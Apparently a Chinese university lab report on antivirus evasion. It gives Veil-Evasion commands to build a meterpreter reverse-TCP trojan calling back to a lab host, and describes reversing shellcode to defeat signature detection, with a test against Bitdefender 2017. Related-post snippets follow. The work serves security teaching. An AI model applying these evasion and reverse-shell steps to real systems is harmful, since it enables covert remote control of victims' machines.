啟發式惡意軟體檢測
f-prot是一款防毒軟體,有三個啟發引擎,可見其是比較強大的,但其誤報我也深感無能為力啊(後文會介紹)……
基於行為的惡意軟體檢測
改變行為
操作模式
其它方法
從上圖可以看出,許多殺軟一針見血的指出了該程式為「木馬類」程式
所以接下來要展現強大的免殺技術,順利讓我們的木馬潛入特洛伊!
在終端下輸入指令veil-evasion
即可開啟軟體,根據menu
的提示依次鍵入以下指令:
use python/meterpreter/rev_tcp //設定payload
set lhost 192.168.18.128 //設定**連線ip
set port 443 //設定**埠443,預設為4444
generate //生成
5221 //程式名
1
將上述**從虛擬機器裡copy出來,用microsoft visual studio 2013
進行編譯執行生成可執行檔案
在kali下進入msf開啟監聽程序,方式參考博文
在靶機上執行nc1.0
可執行檔案,kali成功獲取許可權
virscan.org檢測結果如下:
小結:可以看出,生成shellcode半手工打造,而不是通過msfvenom指令生成乙個可執行檔案,風險已經降低了不少,但是仍被定性為病毒檔案,所以需要進一步考慮修改**
輸出到文字後複製貼上到木馬源**中,為如下格式:
設定shellcode的逆序後,在木馬程式源**中對其進行再逆序即可完成,實際操作起來只需在主函式開始位置引入乙個初始化函式init()
求逆序,後續和第一部分內容大同小異,不再贅述
最後給一下virscan.org檢測結果:
小結:不難發現,通過對shellcode求其逆序,改變了程式的特徵碼,一下減少了3個防毒引擎,唯一發現病毒的是f-prot
,這是一款啟發式引擎的防毒軟體,但也沒有檢測出病毒型別。相比之下,修改後的已經安全了不少。
廢話不多說了,貼上新版本的**:
最後給一下virscan.org檢測結果:
靶機配置:win10,bitdefender2017最新版(截至2017/3/19)
木馬程式:nc3.0
在kali機上開啟監聽程序,然後在win10靶機上開啟木馬程式(保持病毒防護軟體一直處於工作狀態)
很幸運,bitdefender 2017
並沒有在此過程中報毒,以下是隨便測試的幾條指令
免殺的實驗做的還是很有趣的,有一種在暗夜裡潛行,生怕被人發現的那種刺激感;通過這次實驗,做好免殺還是要有一定的程式設計技巧的,如果完全依賴於meterpreter、加殼工具等一些軟體服務,免殺效果是不明顯的,因為你知道這些可以做免殺可以加殼,難道人家殺軟不知道沒有分析過?所以網路上流行的這些軟體,實際上免殺效果並不好,詳見部落格
免殺最好的效果就是純手工,純人為構造,殺軟可以分析免殺軟體生成的模式進而發現其隱藏的規律,而人為構造的惡意**往往因為不具有普遍性而難以捉摸;但免殺的嘗試不是一蹴而就的,就像這次的實踐,是在不斷的修改**過程中,從開始21家報毒,到後來1家報毒,逐漸達到了免殺的級別,這個過程需要不斷的嘗試;
防毒與免殺就是矛與盾,是一種博弈關係,是一種此消彼長的競爭關係,只要網際網路還存在,防毒與免殺就是網際網路安全永恆的主題;防毒軟體的薄弱在本次實踐中可見一斑,所以以後在網路中要「潔身自好」,不該點選的鏈結別點,來歷不明的第三方軟體別下,定時更新病毒庫、查毒、防毒;
這一種博弈關係非常微妙,就像本文提到的,本來virscan.org的目的可能是幫助檢查是否為病毒檔案,但可能被「我們」這樣的人惡意利用,用來檢測自己的病毒是否免殺;又比如,加殼軟體的初衷可能是版權問題,防止他人惡意反彙編、逆向,但這又能被「我們」利用,讓「殼」變成病毒的保護殼,正所謂,工具本無好壞,人心才有善惡!
20145221高其 Web基礎
介於之前預設設定為80埠,特將埠改為 5221 檢視埠占用情況如下 如果正常,即可繼續執行,該步驟是整個實驗的基礎,保證web服務正常開啟 其中action部分表示的是,在點選submit提交後將會轉向哪個請求,就上面這個 來看,因為本地還沒有這個php檔案,所以點選後肯定是not found ph...
20145320免殺原理與實踐
1 殺軟是如何檢測出惡意 的?惡意 檢測方式 3 免殺的基本方法有哪些?但是當我第二次將這個後面軟體拖到桌面時,則被告知安全?雙擊發現並不能執行,看來還是沒有放過他。同樣嘗試通過virscan.org來檢驗一下 從上圖可以看出,共有20款殺軟一針見血的指出了該程式為 木馬類 程式,但是其中並不包括3...
Exp3 免殺原理與實踐
實驗做到中間的時候,在利用virustotal和virscan兩個平台上檢測時看到確實有不少殺軟做的不怎麼樣。實驗做到最後,發現確實我們對一些軟體進行加殼處理後殺軟也沒殺出來。分析殺軟檢測和免殺原理的時候確實感覺有種魔高一尺道高一丈的感覺 雖然這樣用詞不太準確 真正感覺到我們網路空間的安全性對於一般...